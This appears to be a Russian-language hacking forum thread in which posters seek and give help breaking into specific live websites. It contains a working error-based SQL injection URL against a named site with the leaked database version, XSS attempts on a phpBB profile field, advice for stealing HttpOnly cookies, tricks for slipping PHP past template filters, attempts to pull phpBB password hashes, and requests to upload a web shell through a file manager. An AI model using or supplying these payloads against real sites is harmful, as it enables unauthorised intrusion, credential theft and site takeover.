XSS выполняется на стороне клиента. Выполнить код на сервере непосредственно через эту уязвимость нельзя.
1) Метод TRACE 2) Уязвимость веб-сервера http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053 3) Плагины браузера http://seckb.yehg.net/2012/06/xss-gaining-access-to-httponly-cookie.html
Буду пробовать. Еще в этом phpbb нашел такую штуку, в настройках юзера, там где формат даты вручную можно вводить, ввожу "><script></script> - выдает ошибку mysql: SQL ERROR [ mysql4 ] Data too long for column 'user_dateformat' at row 1 [1406] при этом дата на форуме выглядит теперь вот так Можно ли раскрутить до уязвимости? Стоит там еще ajax chat у них, файл install не удалили, но максимум что с его помощью можно сделать, это выкинуть всех из чата, может я что-то еще не попробовал? Подсобите
Code: http://tonkiimir.ru/reputation.php?u=3+or(1)group+by(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))--+ Duplicate entry '5.1.58-1ubuntu1-log' for key 'group_key' [1062]
Ок, тогда не подскажете, как обойти фильтрацию такого рода: Пишу <? phpinfo() ?> сохраняется как <!--? phpinfo() ?--> Если пишу <? phpinfo() ?> то сохраняется в исходном коде точно так же, а выводится на странице нормально т.е. <? phpinfo() ?>, но не исполняется (( Как же тогда его туды вставить ?
1. Выключена обработка РНР в файлах где Вы пытаетесь его вставить. 2. short_open_tag = off 3. Попробуйте варианты {php}{/php}, <!-- PHP --><!-- ENDPHP --> ну и тому подобные, в некоторых шаблонах проходят такие варианты кода! Да и убедитесь, что тот кусок куда Вы вставляете код, не выводится системой через echo... Боюсь потому у вас и идет вывод на страницу кода РНР! P.S. Вариантов куда больше, думайте не много и сами...
в phpbb3 хэш 34 символа(вместе с $H$) в моем случае вывод максимум 31 символ можно ли как-то сделать, чтобы выводило после 3го символа, т.е. без $H$ ?
Ребятки, прошу, помгите плиз. Нужно залить шелл через Ajex.FileManager v1.0 + В админке есть следующий текстовый редактор CKEditor 3.6.3 (revision 7474). Если кто-то знает как залить прошу откликнуться.
К сожалению, тут попались админы-параноики. Таких путей нет и в помине: Code: http://target.com/FCKeditor/editor/filemanager/upload/test.html http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
Нашёл ошибку http://www.european-athletics.org/favicon.ico/.php можно ли раскрутить, если это скуля или другие варианты